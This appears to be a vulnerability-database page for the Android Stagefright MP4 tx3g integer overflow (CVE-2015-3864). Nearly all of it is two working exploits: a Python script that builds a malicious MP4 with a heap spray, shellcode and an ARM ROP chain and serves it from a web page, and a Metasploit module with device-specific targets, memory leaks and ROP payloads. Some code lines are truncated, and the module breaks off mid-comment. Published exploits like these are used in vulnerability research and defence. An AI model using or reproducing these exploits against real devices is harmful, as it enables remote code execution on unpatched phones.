Related Weaknesses
Weakness Name |
Source |
CWE-189 |
Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers. |
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
10 |
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 38226
Publication date : 2015-09-16 22h00 +00:00
Author : Google Security Research
EDB Verified : Yes
import cherrypy
import os
import pwnlib.asm as asm
import pwnlib.elf as elf
import sys
import struct
with open('shellcode.bin', 'rb') as tmp:
shellcode =
while len(shellcode) % 4 != 0:
shellcode += '\x00'
# heap grooming configuration
alloc_size = 0x20
groom_count = 0x4
spray_size = 0x100000
spray_count = 0x10
# address of the buffer we allocate for our shellcode
mmap_address = 0x90000000
# addresses that we need to predict
libc_base = 0xb6ebd000
spray_address = 0xb3000000
# ROP gadget addresses
stack_pivot = None
pop_pc = None
pop_r0_r1_r2_r3_pc = None
pop_r4_r5_r6_r7_pc = None
ldr_lr_bx_lr = None
ldr_lr_bx_lr_stack_pad = 0
mmap64 = None
memcpy = None
def find_arm_gadget(e, gadget):
gadget_bytes = asm.asm(gadget, arch='arm')
gadget_address = None
for address in
if address % 4 == 0:
gadget_address = address
if gadget_bytes ==, len(gadget_bytes)):
print asm.disasm(gadget_bytes, vma=gadget_address, arch='arm')
return gadget_address
def find_thumb_gadget(e, gadget):
gadget_bytes = asm.asm(gadget, arch='thumb')
gadget_address = None
for address in
if address % 2 == 0:
gadget_address = address + 1
if gadget_bytes == - 1, len(gadget_bytes)):
print asm.disasm(gadget_bytes, vma=gadget_address-1, arch='thumb')
return gadget_address
def find_gadget(e, gadget):
gadget_address = find_thumb_gadget(e, gadget)
if gadget_address is not None:
return gadget_address
return find_arm_gadget(e, gadget)
def find_rop_gadgets(path):
global memcpy
global mmap64
global stack_pivot
global pop_pc
global pop_r0_r1_r2_r3_pc
global pop_r4_r5_r6_r7_pc
global ldr_lr_bx_lr
global ldr_lr_bx_lr_stack_pad
e = elf.ELF(path)
e.address = libc_base
memcpy = e.symbols['memcpy']
print '[*] memcpy : 0x{:08x}'.format(memcpy)
mmap64 = e.symbols['mmap64']
print '[*] mmap64 : 0x{:08x}'.format(mmap64)
# .text:00013344 ADD R2, R0, #0x4C
# .text:00013348 LDMIA R2, {R4-LR}
# .text:0001334C TEQ SP, #0
# .text:00013350 TEQNE LR, #0
# .text:00013354 BEQ botch_0
# .text:00013358 MOV R0, R1
# .text:0001335C TEQ R0, #0
# .text:00013360 MOVEQ R0, #1
# .text:00013364 BX LR
pivot_asm = ''
pivot_asm += 'add r2, r0, #0x4c\n'
pivot_asm += 'ldmia r2, {r4 - lr}\n'
pivot_asm += 'teq sp, #0\n'
pivot_asm += 'teqne lr, #0'
stack_pivot = find_arm_gadget(e, pivot_asm)
print '[*] stack_pivot : 0x{:08x}'.format(stack_pivot)
pop_pc_asm = 'pop {pc}'
pop_pc = find_gadget(e, pop_pc_asm)
print '[*] pop_pc : 0x{:08x}'.format(pop_pc)
pop_r0_r1_r2_r3_pc = find_gadget(e, 'pop {r0, r1, r2, r3, pc}')
print '[*] pop_r0_r1_r2_r3_pc : 0x{:08x}'.format(pop_r0_r1_r2_r3_pc)
pop_r4_r5_r6_r7_pc = find_gadget(e, 'pop {r4, r5, r6, r7, pc}')
print '[*] pop_r4_r5_r6_r7_pc : 0x{:08x}'.format(pop_r4_r5_r6_r7_pc)
ldr_lr_bx_lr_stack_pad = 0
for i in range(0, 0x100, 4):
ldr_lr_bx_lr_asm = 'ldr lr, [sp, #0x{:08x}]\n'.format(i)
ldr_lr_bx_lr_asm += 'add sp, sp, #0x{:08x}\n'.format(i + 8)
ldr_lr_bx_lr_asm += 'bx lr'
ldr_lr_bx_lr = find_gadget(e, ldr_lr_bx_lr_asm)
if ldr_lr_bx_lr is not None:
ldr_lr_bx_lr_stack_pad = i
def pad(size):
return '#' * size
def pb32(val):
return struct.pack(">I", val)
def pb64(val):
return struct.pack(">Q", val)
def p32(val):
return struct.pack("<I", val)
def p64(val):
return struct.pack("<Q", val)
def chunk(tag, data, length=0):
if length == 0:
length = len(data) + 8
if length > 0xffffffff:
return pb32(1) + tag + pb64(length)+ data
return pb32(length) + tag + data
def alloc_avcc(size):
avcc = 'A' * size
return chunk('avcC', avcc)
def alloc_hvcc(size):
hvcc = 'H' * size
return chunk('hvcC', hvcc)
def sample_table(data):
stbl = ''
stbl += chunk('stco', '\x00' * 8)
stbl += chunk('stsc', '\x00' * 8)
stbl += chunk('stsz', '\x00' * 12)
stbl += chunk('stts', '\x00' * 8)
stbl += data
return chunk('stbl', stbl)
def memory_leak(size):
pssh = 'leak'
pssh += 'L' * 16
pssh += pb32(size)
pssh += 'L' * size
return chunk('pssh', pssh)
def heap_spray(size):
pssh = 'spry'
pssh += 'S' * 16
pssh += pb32(size)
page = ''
nop = asm.asm('nop', arch='thumb')
while len(page) < 0x100:
page += nop
page += shellcode
while len(page) < 0xed0:
page += '\xcc'
# MPEG4DataSource fake vtable
page += p32(stack_pivot)
# pivot swaps stack then returns to pop {pc}
page += p32(pop_r0_r1_r2_r3_pc)
# mmap64(mmap_address,
# 0x1000,
# -1,
# 0);
page += p32(mmap_address) # r0 = address
page += p32(0x1000) # r1 = size
page += p32(7) # r2 = protection
page += p32(0x32) # r3 = flags
page += p32(ldr_lr_bx_lr) # pc
page += pad(ldr_lr_bx_lr_stack_pad)
page += p32(pop_r4_r5_r6_r7_pc) # lr
page += pad(4)
page += p32(0x44444444) # r4
page += p32(0x55555555) # r5
page += p32(0x66666666) # r6
page += p32(0x77777777) # r7
page += p32(mmap64) # pc
page += p32(0xffffffff) # fd (and then r4)
page += pad(4) # padding (and then r5)
page += p64(0) # offset (and then r6, r7)
page += p32(pop_r0_r1_r2_r3_pc) # pc
# memcpy(shellcode_address,
# spray_address + len(rop_stack),
# len(shellcode));
page += p32(mmap_address) # r0 = dst
page += p32(spray_address - 0xed0) # r1 = src
page += p32(0xed0) # r2 = size
page += p32(0x33333333) # r3
page += p32(ldr_lr_bx_lr) # pc
page += pad(ldr_lr_bx_lr_stack_pad)
page += p32(pop_r4_r5_r6_r7_pc) # lr
page += pad(4)
page += p32(0x44444444) # r4
page += p32(0x55555555) # r5
page += p32(0x66666666) # r6
page += p32(0x77777777) # r7
page += p32(memcpy) # pc
page += p32(0x44444444) # r4
page += p32(0x55555555) # r5
page += p32(0x66666666) # r6
page += p32(0x77777777) # r7
page += p32(mmap_address + 1) # pc
while len(page) < 0x1000:
page += '#'
pssh += page * (size // 0x1000)
return chunk('pssh', pssh)
def exploit_mp4():
ftyp = chunk("ftyp","69736f6d0000000169736f6d".decode("hex"))
trak = ''
# heap spray so we have somewhere to land our corrupted vtable
# pointer
# yes, we wrap this in a sample_table for a reason; the
# NuCachedSource we will be using otherwise triggers calls to mmap,
# leaving our large allocations non-contiguous and making our chance
# of failure pretty high. wrapping in a sample_table means that we
# wrap the NuCachedSource with an MPEG4Source, making a single
# allocation that caches all the data, doubling our heap spray
# effectiveness :-)
trak += sample_table(heap_spray(spray_size) * spray_count)
# heap groom for our MPEG4DataSource corruption
# get the default size allocations for our MetaData::typed_data
# groom allocations out of the way first, by allocating small blocks
# instead.
trak += alloc_avcc(8)
trak += alloc_hvcc(8)
# we allocate the initial tx3g chunk here; we'll use the integer
# overflow so that the allocated buffer later is smaller than the
# original size of this chunk, then overflow all of the following
# MPEG4DataSource object and the following pssh allocation; hence why
# we will need the extra groom allocation (so we don't overwrite
# anything sensitive...)
# | tx3g | MPEG4DataSource | pssh |
overflow = 'A' * 24
# | tx3g ----------------> | pssh |
overflow += p32(spray_address) # MPEG4DataSource vtable ptr
overflow += '0' * 0x48
overflow += '0000' # r4
overflow += '0000' # r5
overflow += '0000' # r6
overflow += '0000' # r7
overflow += '0000' # r8
overflow += '0000' # r9
overflow += '0000' # r10
overflow += '0000' # r11
overflow += '0000' # r12
overflow += p32(spray_address + 0x20) # sp
overflow += p32(pop_pc) # lr
trak += chunk("tx3g", overflow)
# defragment the for alloc_size blocks, then make our two
# allocations. we end up with a spurious block in the middle, from
# the temporary ABuffer deallocation.
# | pssh | - | pssh |
trak += memory_leak(alloc_size) * groom_count
# | pssh | - | pssh | .... | avcC |
trak += alloc_avcc(alloc_size)
# | pssh | - | pssh | .... | avcC | hvcC |
trak += alloc_hvcc(alloc_size)
# | pssh | - | pssh | pssh | avcC | hvcC | pssh |
trak += memory_leak(alloc_size) * 8
# | pssh | - | pssh | pssh | avcC | .... |
trak += alloc_hvcc(alloc_size * 2)
# entering the stbl chunk triggers allocation of an MPEG4DataSource
# object
# | pssh | - | pssh | pssh | avcC | MPEG4DataSource | pssh |
stbl = ''
# | pssh | - | pssh | pssh | .... | MPEG4DataSource | pssh |
stbl += alloc_avcc(alloc_size * 2)
# | pssh | - | pssh | pssh | tx3g | MPEG4DataSource | pssh |
# | pssh | - | pssh | pssh | tx3g ----------------> |
overflow_length = (-(len(overflow) - 24) & 0xffffffffffffffff)
stbl += chunk("tx3g", '', length = overflow_length)
trak += chunk('stbl', stbl)
return ftyp + chunk('trak', trak)
index_page = '''
<!DOCTYPE html>
window.setTimeout('location.reload(true);', 4000);
<iframe src='/exploit.mp4'></iframe>
class ExploitServer(object):
exploit_file = None
exploit_count = 0
def index(self):
self.exploit_count += 1
print '*' * 80
print 'exploit attempt: ' + str(self.exploit_count)
print '*' * 80
return index_page
def exploit(self):
cherrypy.response.headers['Content-Type'] = 'video/mp4'
cherrypy.response.headers['Content-Encoding'] = 'gzip'
if self.exploit_file is None:
exploit_uncompressed = exploit_mp4()
with open('exploit_uncompressed.mp4', 'wb') as tmp:
os.system('gzip exploit_uncompressed.mp4')
with open('exploit_uncompressed.mp4.gz', 'rb') as tmp:
self.exploit_file =
os.system('rm exploit_uncompressed.mp4.gz')
return self.exploit_file
def main():
with open('exploit.mp4', 'wb') as tmp:
if __name__ == '__main__':
Exploit Database EDB-ID : 40436
Publication date : 2016-09-26 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
# This module requires Metasploit:
# Current source:
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
'Name' => "Android Stagefright MP4 tx3g Integer Overflow",
'Description' => %q{
This module exploits a integer overflow vulnerability in the Stagefright
Library ( The vulnerability occurs when parsing specially
crafted MP4 files. While a wide variety of remote attack vectors exist, this
particular exploit is designed to work within an HTML5 compliant browser.
Exploitation is done by supplying a specially crafted MP4 file with two
tx3g atoms that, when their sizes are summed, cause an integer overflow when
processing the second atom. As a result, a temporary buffer is allocated
with insufficient size and a memcpy call leads to a heap overflow.
This version of the exploit uses a two-stage information leak based on
corrupting the MetaData that the browser reads from mediaserver. This method
is based on a technique published in NorthBit's Metaphor paper. First,
we use a variant of their technique to read the address of a heap buffer
located adjacent to a SampleIterator object as the video HTML element's
videoHeight. Next, we read the vtable pointer from an empty Vector within
the SampleIterator object using the video element's duration. This gives
us a code address that we can use to determine the base address of
libstagefright and construct a ROP chain dynamically.
NOTE: the mediaserver process on many Android devices (Nexus, for example) is
constrained by SELinux and thus cannot use the execve system call. To avoid
this problem, the original exploit uses a kernel exploit payload that disables
SELinux and spawns a shell as root. Work is underway to make the framework
more amenable to these types of situations. Until that work is complete, this
exploit will only yield a shell on devices without SELinux or with SELinux in
permissive mode.
'License' => MSF_LICENSE,
'Author' =>
# Exodus/jordan # initial discovery / disclosure
'jduck', # Metasploit module, further infoleak development
'NorthBit' # intiial information leak implementation
'References' =>
[ 'CVE', '2015-3864' ],
[ 'URL', '' ],
[ 'URL', '' ],
[ 'URL', '' ],
[ 'URL', '' ],
# Not used, but related
[ 'URL', '' ],
[ 'URL', '' ],
[ 'URL', '' ],
'Payload' =>
'Space' => 2048,
'DisableNops' => true,
#'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp' },
'Platform' => 'linux',
'Arch' => [ARCH_ARMLE], # TODO: , ARCH_X86, ARCH_X86_64, ARCH_MIPSLE],
'Targets' =>
[ 'Automatic', {} ],
# Each target includes information about the device, firmware, and
# how exactly to about exploiting it.
# Primarily, these targets are used to map a browser's User-Agent to
# exploit specifics for that device / build.
'Nexus 7 (Wi-Fi) (razor) with Android 5.0 (LRX21P)',
'Model' => 'Nexus 7',
'Build' => 'LRX21P',
'Release' => '5.0',
'Rop' => 'lrx',
'SprayAddress' => 0xb1508000
'Nexus 7 (Wi-Fi) (razor) with Android 5.0.1 (LRX22C)',
'Model' => 'Nexus 7',
'Build' => 'LRX22C',
'Release' => '5.0.1',
'Rop' => 'lrx'
'Nexus 7 (Wi-Fi) (razor) with Android 5.0.2 (LRX22G)',
'Model' => 'Nexus 7',
'Build' => 'LRX22G',
'Release' => '5.0.2',
'Rop' => 'lrx'
'Nexus 7 (Wi-Fi) (razor) with Android 5.1 (LMY47O)',
'Model' => 'Nexus 7',
'Build' => 'LMY47O',
'Release' => '5.1',
'Rop' => 'lmy-1'
'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY47V)',
'Model' => 'Nexus 7',
'Build' => 'LMY47V',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48G)',
'Model' => 'Nexus 7',
'Build' => 'LMY48G',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48I)',
'Model' => 'Nexus 7',
'Build' => 'LMY48I',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
'Nexus 7 (Mobile) (razorg) with Android 5.0.2 (LRX22G)',
'Model' => 'Nexus 7',
'Build' => 'LRX22G',
'Release' => '5.0.2',
'Rop' => 'lrx'
'Nexus 7 (Mobile) (razorg) with Android 5.1 (LMY47O)',
'Model' => 'Nexus 7',
'Build' => 'LMY47O',
'Release' => '5.1',
'Rop' => 'lmy-1'
'Nexus 7 (Mobile) (razorg) with Android 5.1.1 (LMY47V)',
'Model' => 'Nexus 7',
'Build' => 'LMY47V',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
'Nexus 5 (hammerhead) with Android 5.0 (LRX21O)',
'Model' => 'Nexus 5',
'Build' => 'LRX21O',
'Release' => '5.0',
'Rop' => 'lrx'
'Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)',
'Model' => 'Nexus 5',
'Build' => 'LRX22C',
'Release' => '5.0.1',
'Rop' => 'lrx'
'Nexus 5 (hammerhead) with Android 5.1 (LMY47D)',
'Model' => 'Nexus 5',
'Build' => 'LMY47D',
'Release' => '5.1',
'Rop' => 'lmy-1'
'Nexus 5 (hammerhead) with Android 5.1 (LMY47I)',
'Model' => 'Nexus 5',
'Build' => 'LMY47I',
'Release' => '5.1',
'Rop' => 'lmy-1'
'Nexus 5 (hammerhead) with Android 5.1.1 (LMY48B)',
'Model' => 'Nexus 5',
'Build' => 'LMY48B',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
'Nexus 5 (hammerhead) with Android 5.1.1 (LMY48I)',
'Model' => 'Nexus 5',
'Build' => 'LMY48I',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
'Nexus 6 (shamu) with Android 5.0 (LRX21O)',
'Model' => 'Nexus 6',
'Build' => 'LRX21O',
'Release' => '5.0',
'Rop' => 'lrx'
'Nexus 6 (shamu) with Android 5.0.1 (LRX22C)',
'Model' => 'Nexus 6',
'Build' => 'LRX22C',
'Release' => '5.0.1',
'Rop' => 'lrx'
'Nexus 6 (shamu) with Android 5.1 (LMY47D)',
'Model' => 'Nexus 6',
'Build' => 'LMY47D',
'Release' => '5.1',
'Rop' => 'lmy-1'
'Nexus 6 (shamu) with Android 5.1 (LMY47E)',
'Model' => 'Nexus 6',
'Build' => 'LMY47E',
'Release' => '5.1',
'Rop' => 'lmy-1'
'Nexus 6 (shamu) with Android 5.1 (LMY47I)',
'Model' => 'Nexus 6',
'Build' => 'LMY47I',
'Release' => '5.1',
'Rop' => 'lmy-1'
'Nexus 6 (shamu) with Android 5.1.1 (LYZ28E)',
'Model' => 'Nexus 6',
'Build' => 'LYZ28E',
'Release' => '5.1.1',
'Rop' => 'shamu / LYZ28E'
'Nexus 6 (shamu) with Android 5.1 (LMY47M)',
'Model' => 'Nexus 6',
'Build' => 'LMY47M',
'Release' => '5.1',
'Rop' => 'lmy-1'
'Nexus 6 (shamu) with Android 5.1.1 (LMY47Z)',
'Model' => 'Nexus 6',
'Build' => 'LMY47Z',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
'Nexus 6 (shamu) with Android 5.1.1 (LVY48C)',
'Model' => 'Nexus 6',
'Build' => 'LVY48C',
'Release' => '5.1.1',
'Rop' => 'lmy-1'
'Nexus 6 (shamu) with Android 5.1.1 (LMY48I)',
'Model' => 'Nexus 6',
'Build' => 'LMY48I',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
'Nexus 6 (shamu) with Android 5.1.1 (LYZ28J)',
'Model' => 'Nexus 6',
'Build' => 'LYZ28J',
'Release' => '5.1.1',
'Rop' => 'shamu / LYZ28J'
'Nexus 6 (shamu) with Android 5.1.1 (LVY48E)',
'Model' => 'Nexus 6',
'Build' => 'LVY48E',
'Release' => '5.1.1',
'Rop' => 'lmy-2'
'Samsung Galaxy S5 (VZW SM-G900V) with Android 5.0 (LRX21T)',
'Model' => 'SM-G900V',
'Build' => 'LRX21T',
'Release' => '5.0',
'Rop' => 'sm-g900v / OE1',
'SprayAddress' => 0xaf008000,
'SampleIteratorSize' => 0xa8,
'VectorSize' => 0xec
'Privileged' => true,
'DisclosureDate' => "Aug 13 2015",
'DefaultTarget' => 0))
['OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class)
def exploit
@peers = {}
def get_target(request)
agent = request.headers['User-Agent']
self.targets.each do |t|
next if == 'Automatic'
regexp = Regexp.escape("Linux; Android #{t['Release']}; #{t['Model']} Build/#{t['Build']}")
return t if (agent =~ /#{regexp}/)
return nil
# Construct a page worth of data that we'll spray
# NOTE: The data within is target-specific
def build_spray(my_target, peer, spray_addr)
# Initialize the page to a reasonable state.
page = ''
page = rand_text(4096)
# Load target-based exploit-specific variables
details = get_details(my_target)
return nil if details.nil?
# Calculate the base address
vector_rva = details['VectorRVA']
vector_ptr = peer[:vector_vtable_addr]
libsf_base = (vector_ptr & 0xfffff000) - (vector_rva & 0xfffff000)
# If we smash mDataSource, this ends up controlling the program counter!!
0xb65fd7c4 <parseChunk(long long*, int)+4596>: ldr r2, [r0, #0]
0xb65fd7c6 <parseChunk(long long*, int)+4598>: str r1, [sp, #0]
0xb65fd7c8 <parseChunk(long long*, int)+4600>: ldr r5, [r7, #0]
0xb65fd7ca <parseChunk(long long*, int)+4602>: str r5, [sp, #4]
0xb65fd7cc <parseChunk(long long*, int)+4604>: ldr r6, [r2, #28]
0xb65fd7ce <parseChunk(long long*, int)+4606>: ldrd r2, r3, [r10]
0xb65fd7d2 <parseChunk(long long*, int)+4610>: blx r6
0xb65fd7d4 <parseChunk(long long*, int)+4612>: ldrd r2, r3, [sp, #64] ; 0x40
# Initialize our pivot values and adjust them to libstagefright's base.
# First, load r0 (pointer to our buffer) into some register..
mds_pivot1 = libsf_base + details['Pivot1']
# Next, load sp (and probably other stuff) from there
mds_pivot2 = libsf_base + details['Pivot2']
# Finally, skip over some stuff and kick of the ROP chain
mds_adjust = libsf_base + details['Adjust']
# The offset to the ROP change beginning
rop_start_off = 0x30
# Point sp to the remainder of the ROP chain
new_sp = spray_addr + rop_start_off
# Sometimes the spray isn't aligned perfectly, this fixes that situation...
unalign_off = 0x998
new_sp2 = new_sp + 0x1000 - unalign_off
# This pointer should point to the beginning of the shellcode payload
payload_ptr = spray_addr + 0xa0
# Put the stack back!
stack_fix = "\x0a\xd0\xa0\xe1" # mov sp, r10 ; restore original sp
# Depending on the pivot strategy in use, we have to set things up slightly
# differently...
# In each case, we use a two-stage pivot that reads the spray address from
# r0 (we smashed that, remember).
# The addroffs array is used to map values to the offsets where the pivots
# expect them to be.
case details['PivotStrategy']
when 'lrx'
addroffs = [
[ 0x0, new_sp ],
[ 0x10, mds_pivot2 ],
[ 0x1c, mds_pivot1 ],
# Since we are only popping one item in pivot2, we reduce the rop_start_off
rop_start_off -= 4
# Adjust the payload pointer
payload_ptr -= 4
when 'lmy-1'
addroffs = [
[ 0x8, new_sp ],
[ 0xc, mds_adjust ],
[ 0x10, mds_pivot2 ],
[ 0x1c, mds_pivot1 ]
when 'lmy-2'
ptr_to_mds_pivot2 = spray_addr + 0x10 - 0x18 # adjust for displacement
addroffs = [
[ 0x0, ptr_to_mds_pivot2 ],
[ 0x8, new_sp ],
[ 0xc, mds_adjust ],
[ 0x10, mds_pivot2 ],
[ 0x1c, mds_pivot1 ]
stack_fix = "\x09\xd0\xa0\xe1" # mov sp, r9 ; restore original sp
when 'lyz'
ptr_to_mds_pivot2 = spray_addr + 0x8
addroffs = [
[ 0x0, ptr_to_mds_pivot2 ],
[ 0x8, mds_pivot2 ],
[ 0x1c, mds_pivot1 ],
[ 0x24, new_sp ],
# lr is at 0x28!
[ 0x2c, mds_adjust ]
# We can't fix it becuse we don't know where the original stack is anymore :-/
stack_fix = ""
when 'sm-g900v'
addroffs = [
[ 0x4, mds_adjust ],
[ 0x10, new_sp ],
[ 0x1c, mds_pivot1 ],
[ 0x20, mds_pivot2 ]
print_error("ERROR: PivotStrategy #{details['PivotStrategy']} is not implemented yet!")
return nil
# We need our ROP to build the page... Create it.
rop = generate_rop_payload('stagefright', stack_fix + payload.encoded, {'base' => libsf_base, 'target' => my_target['Rop'] })
# Fix up the payload pointer in the ROP
idx = rop.index([ 0xc600613c ].pack('V'))
rop[idx, 4] = [ payload_ptr ].pack('V')
# Insert the ROP
page[rop_start_off, rop.length] = rop
# Insert the special values...
addroffs.each do |ao|
off,addr = ao
page[off,4] = [ addr ].pack('V')
# Sometimes the spray isn't aligned perfectly...
if addr == new_sp
page[off+unalign_off,4] = [ new_sp2 ].pack('V')
page[off+unalign_off,4] = [ addr ].pack('V')
# MPEG-4 specific functionality
def get_atom(tag, data='', length=nil)
if tag.length != 4
raise 'Yo! They call it "FourCC" for a reason.'
length ||= data.length + 8
if length >= 2**32
return [ [ 1 ].pack('N'), tag, [ length ].pack('Q>'), data ].join
[ [ length ].pack('N'), tag, data ].join
def get_stsc(num)
stsc_data = [ 0, num ].pack('N*') # version/flags, mNumSampleToChunkOffsets
stsc_data << [ 13+1, 0x5a5a5a5a, 37 ].pack('N*') * num
get_atom('stsc', stsc_data)
def get_ftyp
# Build the MP4 header...
ftyp = 'mp42'
ftyp << [ 0 ].pack('N')
ftyp << 'mp42'
ftyp << 'isom'
get_atom('ftyp', ftyp)
def get_pssh(alloc_size)
pssh_data = ''
pssh_data << [ 0 ].pack('N')
pssh_data << [ 0, 0, 0, 0 ].pack('N*')
pssh_data << [ alloc_size ].pack('N')
alloc_size.times do |off|
pssh_data << [ 0x55aa0000 + off ] .pack('V')
get_atom('pssh', pssh_data)
def get_metaitem(tag, type, data)
ret = ''
ret << tag.reverse
ret << type.reverse
case type
when 'in32'
ret << [ 4, data ].pack('V*')
when 'in64'
ret << [ 8, data ].pack('V*')
raise "How do you expect me to make a #{type.inspect} ??"
def jemalloc_round(sz)
# These are in the 16-byte aligned runs
if (sz > 0x10 && sz <= 0x80)
round = 16
# 160 starts the 32-byte aligned runs
elsif (sz > 0x80 && sz <= 0x140)
round = 32
raise "Don't know how to round 0x%x" % sz
ret = (sz + (round - 1)) / round
ret *= round
return ret
# Leak data from mediaserver back to the browser!
# Stage 1 - leak a heap pointer near a SampleIterator object
# Stage 2 - read a code pointer from the SampleIterator object
def get_mp4_leak(my_target, peer)
# MPEG4 Fileformat Reference:
# Structure:
# [File type Chunk][Other Atom Chunks]
# Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data]
sampiter_alloc_size = 0x78
sampiter_alloc_size = my_target['SampleIteratorSize'] if not my_target['SampleIteratorSize'].nil?
sampiter_rounded = jemalloc_round(sampiter_alloc_size)
vector_alloc_size = 0x8c
vector_alloc_size = my_target['VectorSize'] if not my_target['VectorSize'].nil?
groom_count = 0x10
is_samsung = (my_target['Rop'] == 'sm-g900v / OE1')
# Coerce the heap into a favorable shape (fill holes)
shape_vector = get_pssh(vector_alloc_size)
# Allocate a block of memory of the correct size
placeholder = get_atom('titl', ('t' * 4) + ('titl' * (vector_alloc_size / 4)) + [ 0 ].pack('C'))
# Make the first tx3g chunk, which is meant to overflow into a MetaData array.
# We account for the overhead of both chunks here and aim for this layout:
# placeholder after re-allocation | vector array data
# <len><tag><padding><is-64bit><tag><len hi><len low> | <overflow data>
# Realistically, tx3g1_padding can be any number that rounds up to the
# correct size class.
tx3g1_overhead = 0x8
tx3g2_overhead = 0x10
tx3g_target = jemalloc_round(vector_alloc_size)
tx3g1_padding = tx3g_target - (tx3g1_overhead + tx3g2_overhead)
tx3g_data = 'x' * tx3g1_padding
tx3g_1 = get_atom('tx3g', tx3g_data)
# NOTE: hvcC added in 3b5a6b9fa6c6825a1d0b441429e2bb365b259827 (5.0.0 and later only)
# avcC was in the initial commit.
near_sampiter = get_atom('hvcC', "C" * sampiter_alloc_size)
# Craft the data that will overwrite the header and part of the MetaData
# array...
more_data = ''
more_data << [ 9, vector_alloc_size - 0x10, 0, 0 ].pack('V*')
# Now add the thing(s) we want to control (partially)
# We add some BS entries just to kill the real 'heig' and get proper
# ordering...
near_sampiter_addr = peer[:near_sampiter_addr]
if near_sampiter_addr.nil?
# Part 1. Leak the address of a chunk that should be adjacent to a
# SampleIterator object.
if is_samsung
# On Samsung:
# Before: dmcE, dura, frmR, heig, hvcC, inpS, lang, mime, widt
# After: dmcE, abc1, abc2, abc3, heig...
more_data << get_metaitem('dmcE', 'in32', 1)
more_data << get_metaitem('abc1', 'in32', 31335)
more_data << get_metaitem('abc2', 'in32', 31336)
# On Nexus:
# Before: heig, hvcc, inpS, mime, text, widt
# After: abc3, heig...
more_data << get_metaitem('abc3', 'in32', 31337)
# NOTE: We only use the first 12 bytes so that we don't overwrite the
# pointer that is already there!
heig = get_metaitem('heig', 'in32', 31338)
more_data << heig[0,12]
# Part 2. Read from the specified address, as with the original Metaphor
# exploit.
if is_samsung
# On Samsung:
# Before: dmcE, dura, frmR, heig, hvcC, inpS, lang, mime, widt
# After: dmcE, dura, ...
more_data << get_metaitem('dmcE', 'in32', 1)
# On Nexus:
# Before: avcc, heig, inpS, mime, text, widt
# After: dura, ...
near_sampiter = get_atom('avcC', "C" * sampiter_alloc_size)
# Try to read the mCurrentChunkSampleSizes vtable ptr within a
# SampleIterator object. This only works because the Vector is empty thus
# passing the restrictions imposed by the duration conversion.
ptr_to_vector_vtable = near_sampiter_addr - (sampiter_rounded * 2) + 0x30
more_data << get_metaitem('dura', 'in64', ptr_to_vector_vtable)
# The tx3g2 then needs to trigger the integer overflow, but can contain any
# contents. The overflow will terminate at the end of the file.
# NOTE: The second tx3g chunk's overhead ends up in the slack space between
# the replaced placeholder and the MetaData Vector contents.
big_num = 0x1ffffffff - tx3g_1.length + 1 + vector_alloc_size
tx3g_2 = get_atom('tx3g', more_data, big_num)
# Create a minimal, verified 'trak' to satisfy mLastTrack being set
stbl_data = get_stsc(1)
stbl_data << get_atom('stco', [ 0, 0 ].pack('N*')) # version, mNumChunkOffsets
stbl_data << get_atom('stsz', [ 0, 0, 0 ].pack('N*')) # version, mDefaultSampleSize, mNumSampleSizes
stbl_data << get_atom('stts', [ 0, 0 ].pack('N*')) # version, mTimeToSampleCount
stbl = get_atom('stbl', stbl_data)
verified_trak = get_atom('trak', stbl)
# Start putting it all together into a track.
trak_data = ''
if is_samsung
# Put some legitimate duration information so we know if we failed
mdhd_data = [ 0 ].pack('N') # version
mdhd_data << "\x00" * 8 # padding
mdhd_data << [ 1 ].pack('N') # timescale
mdhd_data << [ 314 ].pack('N') # duration
mdhd_data << [ 0 ].pack('n') # lang
trak_data << get_atom('mdhd', mdhd_data)
# Add this so that our file is identified as video/mp4
mp4v_data = ''
mp4v_data << [ 0 ].pack('C') * 24 # padding
mp4v_data << [ 1024 ].pack('n') # width
mp4v_data << [ 768 ].pack('n') # height
mp4v_data << [ 0 ].pack('C') * (78 - mp4v_data.length) # padding
trak_data << get_atom('mp4v', mp4v_data) # satisfy hasVideo = true
# Here, we cause allocations such that we can replace the placeholder...
if is_samsung
trak_data << placeholder # Somethign we can free
trak_data << shape_vector # Eat the loose block...
trak_data << stbl # Cause the growth of the track->meta Vector
trak_data << stbl # Cause the growth of the track->meta Vector
trak_data << placeholder # Somethign we can free
trak_data << shape_vector # Eat the loose block...
# Add the thing whose entry in the MetaData vector we want to overwrite...
trak_data << near_sampiter
# Get our overflow data into memory
trigger = ''
trigger << tx3g_1
# Free the place holder
trigger << get_atom('titl', ('t' * 4) + ('BBBB' * vector_alloc_size) + [ 0 ].pack('C'))
# Overflow the temporary buffer into the following MetaData array
trigger << tx3g_2
# !!! NOTE !!!
# On Samsung devices, the failure that causes ERR to be returned from
# 'tx3g' processing leads to "skipTrack" being set. This means our
# nasty track and it's metadata get deleted and not returned to the
# browser -- effectively killing the infoleak.
# However! It also handles "skipTrack" being set specially and does not
